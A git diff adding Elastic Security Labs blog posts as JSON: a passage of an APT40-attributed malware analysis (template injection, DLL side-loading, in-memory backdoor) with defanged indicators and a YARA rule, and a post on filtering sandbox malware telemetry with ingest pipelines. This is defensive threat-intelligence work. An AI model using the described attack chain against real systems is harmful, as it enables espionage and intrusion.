+ "document": "---\ntitle: \"A close look at the advanced techniques used in a Malaysian-focused APT campaign\"\nslug: \"advanced-techniques-used-in-malaysian-focused-apt-campaign\"\ndate: \"2022-06-22\"\ndescription: \"Our Elastic Security research team has focused on advanced techniques used in a Malaysian-focused APT campaign. Learn who’s behind it, how the attack works, observed MITRE attack® techniques, and indicators of compromise.\"\nauthor:\n - slug: samir-bousseaden\n - slug: daniel-stepanic\n - slug: elastic-security-intelligence-analytics-team\nimage: \"blog-thumb-castle-tower.jpg\"\ncategory:\n - slug: campaigns\n---\n\nThe Elastic Security Intelligence & Analytics Team researches adversary innovations of many kinds, and has recently focused on an activity group that leveraged remote templates, VBA code evasion, and DLL side-loading techniques. Based on code similarity and shared tactics, techniques, and procedures (TTPs), the team assessed this activity to be possibly linked to a Chinese-based group known as APT40, or Leviathan. The group’s campaign appears to target Malaysian government officials with a lure regarding the 2020 Malaysian political crisis.\n\n## Anatomy of the attack\n\n\n\n\n\nTo initiate their advanced persistent threat (APT) campaign, the group likely delivered a Microsoft Word document as a phishing lure attachment. The image used in the lure (Figure 2) appears to be crafted from a broadcast announcement shared by a Malaysian blogger (Figure 1). The lure image includes the same broadcast time, but the date and speech topic are removed. Once this attachment is opened, a decoy document is presented while behind the scenes, taking the following actions:\n\n- The lure document downloads the remote template RemoteLoad.dotm\n- The remote template executes VBA macro code\n- The VBA macro code unpacks and executes two embedded base64-encoded DLLs (sl1.tmp and sl2.tmp) to c:\\users\\public\\\n\nThis technique is known as template injection, which you may recall from our [Playing defense against Gamaredon Group blog post](https://www.elastic.co/blog/playing-defense-against-gamaredon-group). This an effective approach used by adversaries to bypass perimeter controls such as email gateways.\n\n\n\nBoth embedded DLLs (sl1.tmp and sl2.tmp) are similar and export the same function names: RCT and RCP. The first DLL (sl1.tmp) is used to download a benign executable called LogiMailApp.exe and an associated library LogiMail.dll, and the second DLL (sl2.tmp) is used to execute LogiMailApp.exe, which automatically attempts to execute LogiMail.dll due to an inherent DLL search order vulnerability we’ll cover shortly.\n\n| | | | | |\n| --------------- | --------- | ------------ | -------------------------------- | ------------------------- |\n| File name | File type | Size (bytes) | MD5 | Compile time |\n| LogiMailApp.exe | Win32 EXE | 311656 | 850a163ce1f9cff0367854038d8cfa7e | 2012-09-26 22:13:13+00:00 |\n| LogiMail.dll | Win32 DLL | 105984 | b5a5dc78fb392fae927e9461888f354d | 2020-06-03 04:08:29+00:00 |\n| sl1.tmp | Win32 DLL | 3072 | ccbdda7217ba439dfb6bbc6c3bd594f8 | 2019-11-29 17:15:29+00:00 |\n| sl2.tmp | Win32 DLL | 3072 | dbfa006d64f39cde78b0efda1373309c | 2019-11-29 21:23:44+00:00 |\n\n_Table 1: Dropped files metadata_\n\n\n\nThis implementation stood out to our researchers due to a behavioral idiosyncrasy:\n\n- The Microsoft Office application winword.exe loads sl1.tmp and sl2.tmp DLLs uses the LoadLibraryA method, which is moderately rare\n- These DLLs run explicit commands or install a payload from a URL using the CallWindowProcA method, which appears to be exceptionally rare\n- Both DLLs are deleted after execution\n\n\n\n## Embedded DLLs\n\nThe embedded DLLs, sl1.tmp and sl2.tmp, have very limited functionality — exporting the RCP and RCT functions. The RCP function implements the WinExec method to execute commands where the RCT function uses the URLDownloadToFileA method to download a file from a specified URL.\n\n\n\n## DLL side-loading a backdoor\n\nLogiMailApp.exe, which is downloaded by sl1.tmp and executed by sl2.tmp, is vulnerable to a form of DLL search-order hijacking called side-loading, which automatically searches for and executes LogiMail.dll if found in the same directory. Forms of DLL search-order hijacking can be used with many third-party software applications. In this case, search-order hijacking was used to load a backdoor that exports the following notable functions:\n\n\n\n\n\n\n\nThe adversary-created binary LogiMail.dll exports the function DllGetClassObject that contains critical logic for the execution flow of this sample:\n\n1. Download an AES-encrypted second stage object to %TEMP%\\~liseces1.pcs\n2. Derive a 128-bit AES key and initialization vector from SHA256 of a hardcoded string\n3. Read and decrypt %TEMP%\\~liseces1.pcs in memory using the ReadFile and CryptDecrypt functions\n4. Delete %TEMP%\\~liseces1.pcs from disk\n\n\n\n\n\n\n\n## Second stage backdoor\n\nThe decrypted second stage backdoor is mapped into memory and then its original entry point (OEP) is called, thus bypassing successful detections based on file system scanning.\n\n\n\n\n\nBoth the payload staging server and the second stage infrastructure use dynamic DNS:\n\n\n\nThis payload supports the following capabilities:\n\n- Basic anti-debug checks\n- System and user discovery\n- Execution via command line\n- File discovery, upload, and download\n- Persistence via run registry\n- Encrypt C2 traffic using same AES key\n\n\n\n\n\n\n\n## Possible APT40/Leviathan connection\n\nEarlier in the year, the Malaysian Computer Emergency Response Team (MyCERT) issued an [advisory](https://www.mycert.org.my/portal/advisory?id=MA-774.022020) related to espionage activity targeting their country. The report listed different TTPs and included multiple samples and other technical indicators that align with a threat group known as APT40/Leviathan.\n\nAt a high level, this sample follows the continued trend of targeting Malaysian victims using specific TTPs such as remote templates, employing macros, using DLL side-loading techniques, and leveraging an in-memory implant with dynamic DNS for command and control. More specifically, the second stage implant from this lure shares unique strings and URL references and contains similar functionality that correlates with the previous reporting for APT40/Leviathan. With these similarities, our Intelligence & Analytics Team assesses with moderate confidence that this activity is linked to APT40/Leviathan.\n\nImplant String Similarities with MyCERT Sample:\n\n- /list_direction\n- /post_document\n- /post_login\n- Open Remote File %s Failed For: %s\n- Open Pipe Failed %s\n- Download Read Path Failed %s\n- %02X-%02X-%02X-%02X-%02X-%02X\n- Software\\Microsoft\\Windows\\CurrentVersion\\Run\n- ntkd\n\n\n\n\n\n## Conclusion\n\nIn this post, we highlighted a recent sample that most likely represents the work of a highly organized adversary. Activity groups like this are significant for everyone to take notice of, if only because they represent a higher maturity level of post-exploit innovation. Their cutting edge TTPs today end up being everyone’s run of the mill tomorrow; it’s important to learn from these events.\n\nWe hope that by sharing some of these insights, we can help raise awareness and continue to focus on protecting the world's data from attack. To enable organizations further, we’ve added all the observed MITRE ATT&CK® techniques and indicators of compromise (IoCs) below.\n\n### MITRE ATT&CK® techniques\n\n- [T1193 - Spearphishing Attachment](https://attack.mitre.org/techniques/T1193/)\n- [T1221 - Template Injection](https://attack.mitre.org/techniques/T1221/)\n- [T1060 - Registry Run Keys / Startup Folder](https://attack.mitre.org/techniques/T1060/)\n- [T1073 - DLL Side-Loading](https://attack.mitre.org/techniques/T1073/)\n- [T1129 - Execution through Module Load](https://attack.mitre.org/techniques/T1129/)\n- [T1055 - Process Injection](https://attack.mitre.org/techniques/T1055/)\n- [T1107 - File Deletion](https://attack.mitre.org/techniques/T1107/)\n- [T1140 - Deobfuscate/Decode Files or Information](https://attack.mitre.org/techniques/T1140/)\n- [T1059 - Command-Line Interface](https://attack.mitre.org/techniques/T1059/)\n\n### Indicators of Compromise (IOCs)\n\n#### File names and paths\n\n```\nBubar Parlimen.zip\nBubar Parlimen.docx\nRemoteLoad.dotm\nC:\\Users\\Public\\sl1.tmp\nC:\\Users\\Public\\sl2.tmp\nC:\\Users\\*\\AppData\\Local\\Temp\\~liseces1.pcs\nC:\\Users\\*\\AppData\\Local\\Microsoft\\Office\\LogiMailApp.exe\nC:\\Users\\*\\AppData\\Local\\Microsoft\\Office\\LogiMail.dll\n```\n\n#### Registry keys\n\n```\nHKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\ntkd\n```\n\n#### URLs\n\n```\nhxxps[:]//armybar[.]hopto[.]org/LogiMail.dll\nhxxps[:]//armybar[.]hopto[.]org/LogiMailApp[.]exe\nhxxps[:]//armybar[.]hopto[.]org/Encrypted\nhxxp[:]//tomema.myddns[.]me/postlogin\nhxxp[:]//tomema[.]myddns[.]me/list_direction\nhxxp[:]//tomema[.]myddns[.]me/post_document\n```\n\n#### IPs\n\n```\n104[.]248[.]148[.]156\n139[.]59[.]31[.]188\n```\n\n#### HTTPS certificate\n\n```\n74b5e317527c93539dbaaf84d6a61da92a56012a\n```\n\n#### Hashes\n\n```\n523cbdaf31ddc920e5b6c873f3ab42fb791fb4c9d1f4d9e6a7f174105d4f72a1\nab541df861c6045a17006969dac074a7d300c0a8edd0a5815c8b871b62ecdda7\n145daf50aefb7beec32556fd011e10c9eaa71e356649edfce4404409c1e8fa30\n93810c5fd9a287d85c182d2ad13e7d30f99df76e55bb40e5bc7a486d259810c8\n925f404b0207055f2a524d9825c48aa511199da95120ed7aafa52d3f7594b0c9\nfeca9ad5058bc8571d89c9d5a1eebce09e709cc82954f8dce1564e8cc6750a77\n06a4246be400ad0347e71b3c4ecd607edda59fbf873791d3772ce001f580c1d3\n77ef350639b767ce0a748f94f723a6a88609c67be485b9d8ff8401729b8003d2\n```\n\n### YARA\n\n```\nrule APT_APT40_Implant_June2020 {\n meta:\n version = \"1.0\"\n author = \"Elastic Security\"\n date_added = \"2020-06-19\"\n description = \"APT40 second stage implant\"\n strings:\n $a = \"/list_direction\" fullword wide\n $b = \"/post_document\" fullword wide\n $c = \"/postlogin\" fullword wide\n $d = \"Download Read Path Failed %s\" fullword ascii\n $e = \"Open Pipe Failed %s\" fullword ascii\n $f = \"Open Remote File %s Failed For: %s\" fullword ascii\n $g = \"Download Read Path Failed %s\" fullword ascii\n $h = \"\\\\cmd.exe\" fullword wide\n condition:\n all of them\n}\n```\n\n### References\n\n- [https://www.mycert.org.my/portal/advisory?id=MA-774.022020](https://www.mycert.org.my/portal/advisory?id=MA-774.022020)\n\n- [https://prezi.com/view/jGyAzyy5dTOkDrtwsJi5/](https://prezi.com/view/jGyAzyy5dTOkDrtwsJi5/)\n- [https://www.fireeye.com/blog/threat-research/2019/03/apt40-examining-a-china-nexus-espionage-actor.html](https://www.fireeye.com/blog/threat-research/2019/03/apt40-examining-a-china-nexus-espionage-actor.html)\n- [https://malpedia.caad.fkie.fraunhofer.de/details/win.dadstache](https://malpedia.caad.fkie.fraunhofer.de/details/win.dadstache)\n"
+ },
+ "title": "A close look at the advanced techniques used in a Malaysian-focused APT campaign",
+ "slug": "advanced-techniques-used-in-malaysian-focused-apt-campaign",
+ "date": "2022-06-22",
+ "description": "Our Elastic Security research team has focused on advanced techniques used in a Malaysian-focused APT campaign. Learn who’s behind it, how the attack works, observed MITRE attack® techniques, and indicators of compromise.",
+ "author": [
+ {
+ "slug": "samir-bousseaden"
+ },
+ {
+ "slug": "daniel-stepanic"
+ },
+ {
+ "slug": "elastic-security-intelligence-analytics-team"
+ }
+ ],
+ "image": "blog-thumb-castle-tower.jpg",
+ "category": [
+ {
+ "slug": "campaigns"
+ }
+ ]
+ },
+ "id": "security_labs_content-advanced_techniques_used_in_malaysian_focused_apt_campaign-md",
+ "type": "security_labs_content"
+}
diff --git a/packages/security_labs_content/kibana/security_labs_content/security_labs_content-an_elastic_approach_to_large_scale_dynamic_malware_analysis-md.json b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-an_elastic_approach_to_large_scale_dynamic_malware_analysis-md.json
new file mode 100644
index 00000000000..5a4f44a2655
--- /dev/null
+++ b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-an_elastic_approach_to_large_scale_dynamic_malware_analysis-md.json
@@ -0,0 +1,23 @@
+{
+ "attributes": {
+ "raw": {
+ "document": "---\ntitle: \"An Elastic approach to large-scale dynamic malware analysis\"\nslug: \"an-elastic-approach-to-large-scale-dynamic-malware-analysis\"\ndate: \"2023-07-31\"\ndescription: \"This research reveals insights into some of the large-scale malware analysis performed by Elastic Security Labs, and complements research related to the Detonate framework.\"\nauthor:\n- slug: ruben-groenewoud\n- slug: remco-sprooten\nimage: \"blog-thumb-steel-engine.jpg\"\ncategory:\n---\n## Introduction\n\nIn previous publications, we have written about Detonate: how we built it and how we use it within Elastic for malware analysis. This publication delves deeper into using Detonate for dynamic large-scale malware analysis.\n\nAt a high level, Detonate runs malware and other potentially malicious software in a controlled (i.e., sandboxed) environment where the full suite of Elastic Security capabilities are enabled. For more information about Detonate, check out [Click, Click… Boom! Automating Protections Testing with Detonate](https://www.elastic.co/security-labs/click-click-boom-automating-protections-testing-with-detonate).\n\nA significant portion of the data generated during execution consists of benign and duplicate information. When conducting dynamic malware analysis on a large scale, managing the vast amount of low-value data is a considerable challenge. To address it, we took advantage of several Elastic ingest pipelines, which we leveraged to effectively filter out noise from our datasets. This application of ingest pipelines enabled us to conveniently analyze our large volumes of malware data and identify several malicious behaviors that we were already interested in.\n\nThis research examines the concept of ingest pipelines, exploring their different types and applications, and how to implement them. We will then walk through a comprehensive workflow incorporating these ingest pipelines. We will discuss our scripts and the methods that we created in order to automate the entire process. Finally, we will present our results and discuss how the workflow shared in this publication can be leveraged by others to obtain similar outcomes.\n\n### Overview\n\nIn order to accomplish our large-scale malware analysis goals, we required effective data management. An overview of the chained ingest pipelines and processors that we built is shown below:\n\n\n\nIn summary, we fingerprint known good binaries and store those fingerprints in an enrich index. We do the same thing when we detonate malware or an unknown binary, using a comparison of those fingerprints to quickly filter out low-value data.\n\n### Ingest pipelines\n\n[Ingest pipelines](https://www.elastic.co/guide/en/elasticsearch/reference/current/ingest.html) are a powerful feature that allows you to preprocess and transform data before indexing it into Elasticsearch. They provide a way to perform various actions on incoming documents, such as enriching the data, modifying fields, extracting information, or applying data normalization. Ingest pipelines can be customized to meet specific data processing requirements. Our objective was to create a pipeline that differentiates known benign documents from a dataset containing both benign and malicious records. We ingested large benign and malicious datasets into separate namespaces and built pipelines to normalize the data, calculate fingerprints, and add a specific label based on certain criteria. This label helps differentiate between known benign and unknown data.\n\n### Normalization\n\nNormalization is the process of organizing and transforming data into a consistent and standardized format. When dealing with lots of different data, normalization becomes important to ensure consistency, improve search and analysis capabilities, and enable efficient data processing.\n\nThe goal is to make sure documents with unique identifiers are no longer unique. For example, we remove the unique 6-character filename of the Elastic Agent in the \" `/opt/Elastic/Agent/data/`\" directory after installation. This ensures data from different Elastic Agents can be fully comparable, leading to more filtering opportunities in later pipeline phases.\n\nTo accomplish this, we leveraged the [gsub pipeline](https://www.elastic.co/guide/en/elasticsearch/reference/current/gsub-processor.html). It allowed us to apply regex-based transformations to fields within the data pipeline. We performed pattern matching and substitution operations to normalize event data, such as removing special characters, converting text to lowercase, or replacing certain patterns with standardized values.\n\nBy analyzing our dataset, we discovered a set of candidates that would require normalization, and created a simple Python script to generate a list of gsub processors based on the matching value and the replacement value. The script that we leveraged can be found on [GitHub](https://github.com/elastic/labs-releases/tree/main/tools/malware_research). Using the output of the script, we can leverage dev tools to create a pipeline containing the generated gsub processors.\n\nPrior to utilizing the normalization pipeline, documents would contain random 6 character strings for every single Elastic agent. An example is displayed below.\n\n\n\nAfter ingesting and manipulating the documents through the normalization pipeline, the result looks like the following.\n\n\n\nWhen all documents are normalized, we can continue with the fingerprint calculation process.\n\n### Fingerprint calculation\n\nFingerprint calculations are commonly used to generate a unique identifier for documents based on their content. The [fingerprint ingest pipeline](https://www.elastic.co/guide/en/elasticsearch/reference/current/fingerprint-processor.html) provides a convenient way to generate such identifiers by computing a hash value based on the specified fields and options, allowing for efficient document deduplication and comparison. The pipeline offers various options, including algorithms (such as MD5 or SHA-1), target fields for storing the generated fingerprints, and the ability to include or exclude specific fields in the calculation.\n\nWe needed to calculate the fingerprints of documents ingested into Elasticsearch from several sources and integrations such as endpoint, [auditd manager](https://docs.elastic.co/integrations/auditd_manager), packetbeat, [file integrity monitoring](https://docs.elastic.co/integrations/fim) etc. To calculate the fingerprints, we first needed to specify which fields we wanted to calculate them for. Because different data sources use different fields, it was important to create separate processors for each data type. For our use case, we ended up creating a different fingerprint processor for the following set of event categories:\n\n\n\nBy specifying a condition we ensure that each processor only runs on its corresponding dataset.\n\n\n\nThe included fields to these processors are of the utmost importance, as they can indicate if a field is less static than expected or if an empty field could result in a non-functional pipeline. For example, when working with network data, it might initially make sense to include protocol, destination ip, destination port, source ip and source port. But this will lead to too much noise in the pipeline, as the socket that is opened on a system will be opened on an ephemeral source port, which will result in many unique fingerprints for otherwise identical network traffic. Some fields that may be subject to change relate to file sizes, version numbers, or specific text fields that are not being parsed. Normalization sometimes preserves fields that aren't useful for fingerprinting, and the more specific the fingerprint the less useful it tends to be. Fingerprinting by file hash illustrates this, while adding an empty space to the file causes a new hash to be calculated, this would break an existing hash-based fingerprint of the file.\n\nField selection is a tedious process but vital for good results. For a specific integration, like auditd manager, we can find the [exported fields](https://github.com/elastic/integrations/tree/main/packages/auditd_manager) on [GitHub](https://github.com/elastic/integrations/tree/main/packages) and pick the ones that seem useful for our purposes. An example of the processor that we used for `auditd\\_manager` can be found in the image below.\n\n\n\n### Enrichment process\n\nThe [enrich ingest pipeline](https://www.elastic.co/guide/en/elasticsearch/reference/current/enrich-processor.html) is used for enriching incoming documents with additional information from external data sources. It allows you to enrich your data by performing lookups against an index or data set, based on specific criteria. Common use cases for the enrich ingest pipeline include augmenting documents with data from reference datasets (such as geolocation or customer information) and enriching logs with contextual information (like threat intelligence labels).\n\nFor this project we leveraged enrich pipelines to add a unique identifier to the ingested document if it met certain criteria described within an enrich policy. To accomplish this, we first ingested a large and representative batch of benign data using a combination of normalization and fingerprint calculation pipelines. When the ingestion was completed, we set up several [enrich policies](https://www.elastic.co/guide/en/elasticsearch/reference/current/ingest-enriching-data.html) through the [execute enrich policy API](https://www.elastic.co/guide/en/elasticsearch/reference/current/execute-enrich-policy-api.html). The execution of these enrich policies will create a set of new .enrich-\\* system indices. The results stored within these indices will later be used by the pipelines used to ingest mixed (benign and malicious) data.\n\nThis will make more sense with an example workflow. To leverage the enrich ingest pipeline, we first need to create enrich policies. As we are dealing with different data sources - meaning network data looks very different from auditd manager data - we will have to create one enrich policy per data type. In our enrich policy we may use a query to specify which documents we want to include in our enrich index and which ones we want to exclude. An example enrich policy that should add all auditd manager data to the enrich index, other than the data matching three specific match phrases, is displayed below.\n\n\n\nWe are leveraging the “fingerprint” field which is calculated in the fingerprint processor as our match field. This will create an index filled with benign fingerprints to be used as the enriching index within the enrich pipeline.\n\nAfter creating this policy, we have to execute it for it to read the matching index, read the matching field, query for inclusions and exclusions, and create the new .enrich-\\* system index. We do this by executing a POST request to the \\_execute API.\n\n\n\nWe set wait_for_completion=false to make sure that the policy doesn’t time out. This might occur if the dataset is too large. When we navigate to index management and include hidden indices, we can see that the index is created successfully.\n\n\n\nWe now have a list of known benign fingerprints, which we will use within our enrich pipeline to filter our mixed dataset with. Our enrich pipeline will once again use a condition to differentiate between data sources. An overview of our enrich processors is displayed below.\n\n\n\nFocusing on the auditd manager, we built an enrich processor using the condition field to check if the document's dataset is auditd_manager.auditd. If it matches, we reference the enrich policy we created for that dataset. Using the fingerprint field, we match and enrich incoming documents. If the fingerprint is known within the enrich indices we created, we add the \"enrich_label\" field with the fingerprint to the document. See the processor below.\n\n\n\nOnce a document originating from the auditd_manager.auditd dataset comes through, the enrich processor is executed, and this finally executes a [script processor](https://www.elastic.co/guide/en/elasticsearch/reference/current/script-processor.html). The script processor allows us to run inline or stored scripts on incoming documents. We leverage this functionality to read each document in the pipeline, check whether the “enrich_label” field was added; and if this is the case, we set a new boolean field called “known_benign” to true and remove the “enrich_label” and “enriched_fingerprint” fields. If the document does not contain the “enrich_label” field, we set “known\\_benign” to false. This allows us to easily filter our mixed dataset in Kibana.\n\n\n\nWhen using the “test pipeline” feature by adding a document that contains the “enrich_label”, we can see that the “fingerprint” and the “known_benign” fields are set.\n\n\n\nFor documents that do not contain “enrich\\_label”, just the fingerprint is set.\n\nWorking with these enrich policies requires some setup, but once they are well structured they can truly filter out a lot of noise. Because doing this manually is a lot of work, we created some simple Python scripts to somewhat automate this process. We will go into more detail about how to automate the creation of these enrich policies, their execution, the creation of the enrich pipeline and more shortly.\n\n#### Ingest pipeline chaining\n\nThe [pipeline ingest pipeline](https://www.elastic.co/guide/en/elasticsearch/reference/current/pipeline-processor.html) provides a way to chain multiple ingest pipelines. By chaining pipelines, we create a sequence of operations that collectively shapes the incoming data in the form that we want, facilitating our needs for data normalization, fingerprint calculation, and data enrichment.\n\nIn our work with Detonate, we ended up creating two ingest pipelines. The first will process benign data, which consists of a normalization pipeline and a fingerprint calculation pipeline. The next will process malicious data, consisting of a normalization, fingerprint calculation, and enrichment pipeline. An example of this would be the following:\n\n\n\nWith the pipelines in place, we need to ensure that they are actually being used when ingesting data. To accomplish this, we leverage component templates.\n\n### Component templates\n\n[Component templates](https://www.elastic.co/guide/en/elasticsearch/reference/current/indices-component-template.html) are reusable configurations that define the settings and mappings for specific types of Elasticsearch components. They provide a convenient way to define and manage consistent configurations across multiple components, simplifying the management and maintenance of resources.\n\nWhen you first start using any fleet integrations, you would notice that a lot of component templates are created by default. These are also tagged as \"managed\", meaning that you can't change the configuration.\n\n\n\nIn order to accommodate users that want to post process events that are ingested via the fleet managed agent, all index templates call out to a final component template whose name ends in `@custom`.\n\n\n\nThe settings you put in these components will never be changed by updates. In our use case, we use these templates to add a mapping for the enrichment fields. Most of the data that is ingested via the fleet and its integrations will go through an ingest pipeline. These pipelines will follow the same pattern in order to accommodate user customizations. Take for example the following ingest pipeline:\n\n\n\nWe can see that it is managed by fleet and it is tied to a specific version (e.g. 8.8.0) of the integration. The processor will end by calling the `@custom` pipeline, and ignore it if it doesn't exist.\n\nWe want to add our enrichment data to the documents using the enrichment pipelines we described in the previous section. This can now simply be done by creating the `@custom` pipeline and having that call out to the enrichment pipeline.\n\n\n\n### Automating the process\n\nIn order to create the gsub processors, ingest pipelines, and enrich policies, we had to use three Python scripts. In the next section we will showcase these scripts. If you choose to integrate these scripts, remember that you will need to adjust them to match your own environment in order to make them work.\n\n#### Creating the gsub ingest pipelines\n\nIn order to create a gsub pipeline that will replace the given random paths by static ones we used a Python [script](https://github.com/elastic/labs-releases/blob/main/tools/malware_research/gsub_pipeline_json_object.py) that takes several fields and patterns as an input, and prints out a json object which can be used by the pipeline creation API.\n\n#### Create Custom Pipelines\n\nAfter setting up the gsub pipeline, we leveraged [a second Python script](https://github.com/elastic/labs-releases/blob/main/tools/malware_research/custom_pipelines.py) that searches for all fleet managed configurations that call an @custom ingest pipeline. It will then create the appropriate pipeline, after which all the custom pipelines will be pointing to the `process_local_events` pipeline.\n\n#### Generate Enrichment Processors\n\nFinally, we created a [third](https://github.com/elastic/labs-releases/blob/main/tools/malware_research/enrich_policy_setup.py) Python script that will handle the creation of enrichment processors in four steps.\n\n1. `The cleanup process` : While an enrichment processor is used in an ingest pipeline it cannot be deleted. During testing and development we simply delete and recreate the ingest pipeline. This is of course not recommended for production environments. \n2. `Create enrich policies` : The script will create every individual policy.\n3. `Execute the policies` : This will start the process of creating the hidden enrichment system index. Note that the execution of the policy will take longer than the execution of the script as it will not wait for the completion of the command. Elastic will create the enrichment index in the background.\n4. `Re-create the ingest pipeline` : After the enrich policy has been updated, we can now re-create the ingest pipeline that uses the enrichments. \n\nAfter executing these three scripts, the whole setup is completed, and malicious data can be ingested into the correct namespace.\n\n### Results and limitations\n\nOur benign dataset includes 53,267,892 documents generated by executing trusted binaries on a variety of operating systems and collecting events from high-value data sources. Using this normalized benign dataset, we calculated the fingerprints and created the enrich policies per data type.\n\nWith this setup in place, we detonated 332 samples. After removing the Elastic agent metrics and endpoint alerts from the datasets, we ended up with a mixed dataset containing a total number of 41,710,279 documents.\n\n\n\nAfter setting “known\\_benign” to false, we end up with 1,321,949 documents. This is a decrease of 96.83% in document count.\n\n\n\nThe table below presents an overview of each data source and its corresponding number of documents before and after filtering on our “known\\_benign” field.\n\n\n\nWe can see that we managed to successfully filter most data sources by a decent percentage. Additionally, the numbers presented in the “after” column include malicious data that we do want to capture. For example, amongst the different malware samples several included ransomware - which tends to create a lot of file events. Also, all of the http traffic originated from malware samples trying to connect to their C2’s. The auditd\\_manager and fim.event datasets include a lot of the syscalls and file changes performed by the samples.\n\nWhile building out this pipeline, several lessons were learnt. First of all, as mentioned before, if you add one wrong field to the fingerprint calculation the whole dataset might end up generating lots of noise. This can be seen by adding the source.port to the packetbeat fingerprint calculation, resulting in the endpoint.events.network and all network\\_traffic-\\* datasets to increase drastically.\n\nThe second lesson we learned: it is not only important to have a representative dataset, but it is also important to have a large dataset. These two go hand in hand, but we learnt that having a small dataset or a dataset that does not generate very similar behavior to the dataset that will be ingested later, will cause the pipelines to be less than half as effective.\n\nFinally, some data sources are better suited for this filtering approach than others. For example, when dealing with `system.syslog` and `system.auth` events, most of the fields within the document (except the message field) are always the same. As we cannot use this approach for unstructured data, such as plain text fields, our filter would filter out 99% of the events when just looking at the remaining fields.\n\n### Visualizing results\n\nKibana offers many great options to visualize large datasets. We chose to leverage the Lens functionality within Kibana to search through our malicious dataset. By setting `known\\_benign` to false, setting `count of fingerprint` as a metric, and sorting by ascending order, we can right away see different malware samples execute different tasks. Examples of file events is shown below.\n\n\n\nWithin this table, we can see - suspicious files being created in the `/dev/shm/` directory - “ `HOW_TO_DECRYPT.txt` ” file creations indicating the creation of a ransom message - Files being changed to contain new random file extensions, indicating the ransomware encryption process.\n\nWhen looking into file integrity monitoring events, we can also very easily distinguish benign events from malicious events by applying the same filter.\n\n\n\nRight away we notice the creation of a symlink for a `linux.service` and `bot.service` , and several run control symlinks to establish persistence onto the system.\n\nLooking at network connections, we can see `connection\\_attempted` events from malicious samples to potential C2 servers on several uncommon ports.\n\n\n\nFinally, looking at auditd manager syscall events, we can see the malware opening files such as cmdline and maps and attempting to change the permissions of several files.\n\n\n\nOverall, in our opinion the data cleaning results are very promising and allow us to more efficiently conduct dynamic malware analysis on a large scale. The process can always be further optimized, so feel free to take advantage of our approach and fine tune it to your specific needs.\n\n## Beyond Dynamic Malware Analysis\n\nIn the previous sections we described our exact use case for leveraging fingerprint and enrich ingest pipelines. Other than malware analysis, there are many other fields that can reap the benefits of a workflow similar to the one outlined above. Several of these applications and use cases are described below:\n\n- Forensics and Security: Fingerprinting can be employed in digital forensics and security investigations to identify and link related artifacts or events. It helps in tracing the origin of data, analyzing patterns, and identifying potential threats or anomalies in log files, network traffic, or system events. Researchers over at Microsoft leveraged fuzzy hashing in [previous research](https://techcommunity.microsoft.com/t5/microsoft-security-experts-blog/fuzzy-hashing-logs-to-find-malicious-activity/ba-p/3786669) to detect malicious web shell traffic. \n- Identity Resolution: Fingerprinting can be used to uniquely identify individuals or entities across different data sources. This is useful in applications like fraud detection, customer relationship management, and data integration, where matching and merging records based on unique identifiers is crucial.\n- Data Deduplication: Fingerprinting can help identify and eliminate duplicate records or documents within a dataset. By comparing fingerprints, you can efficiently detect and remove duplicate entries, ensuring data integrity and improving storage efficiency. Readers interested in data deduplication use cases might find great value in pre-built tools such as [Logslash](https://blog.foxio.io/introducing-logslash-and-the-end-of-traditional-logging-2c6708b6fc1c) to achieve this goal.\n- Content Management: Fingerprinting can be used in content management systems to detect duplicate or similar documents, images, or media files. It aids in content deduplication, similarity matching, and content-based searching by improving search accuracy and enhancing the overall user experience.\n- Media Identification: Fingerprinting techniques are widely used in media identification and recognition systems. By generating unique fingerprints for audio or video content, it becomes possible to identify copyrighted material, detect plagiarism, or enable content recommendation systems based on media similarity.\n\n## Conclusion\n\nThere are many different approaches to dynamic malware analysis. This blog post explored some of these options by leveraging the powerful capabilities offered by Elastic. Our aim was to both present a new method of dynamic malware analysis while at the same time broadening your understanding and knowledge of the built-in functionalities within Elastic.\n\nElastic Security Labs is the threat intelligence branch of Elastic Security dedicated to creating positive change in the threat landscape. Elastic Security Labs provides publicly available research on emerging threats with an analysis of strategic, operational, and tactical adversary objectives, then integrates that research with the built-in detection and response capabilities of Elastic Security.\n\nFollow Elastic Security Labs on Twitter @elasticseclabs and check out our research at [www.elastic.co/security-labs/](http://www.elastic.co/security-labs/).\n\n"
+ },
+ "title": "An Elastic approach to large-scale dynamic malware analysis",
+ "slug": "an-elastic-approach-to-large-scale-dynamic-malware-analysis",
+ "date": "2023-07-31",
+ "description": "This research reveals insights into some of the large-scale malware analysis performed by Elastic Security Labs, and complements research related to the Detonate framework.",
+ "author": [
+ {
+ "slug": "ruben-groenewoud"
+ },
+ {
+ "slug": "remco-sprooten"
+ }
+ ],
+ "image": "blog-thumb-steel-engine.jpg",
+ "category": null
+ },
+ "id": "security_labs_content-an_elastic_approach_to_large_scale_dynamic_malware_analysis-md",
+ "type": "security_labs_content"
+}
diff --git a/packages/security_labs_content/kibana/security_labs_content/security_labs_content-analysis_of_log4shell_cve_2021_45046-md.json b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-analysis_of_log4shell_cve_2021_45046-md.json
new file mode 100644
index 00000000000..b9a6828543b
--- /dev/null
+++ b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-analysis_of_log4shell_cve_2021_45046-md.json
@@ -0,0 +1,27 @@
+{
+ "attributes": {
+ "raw": {
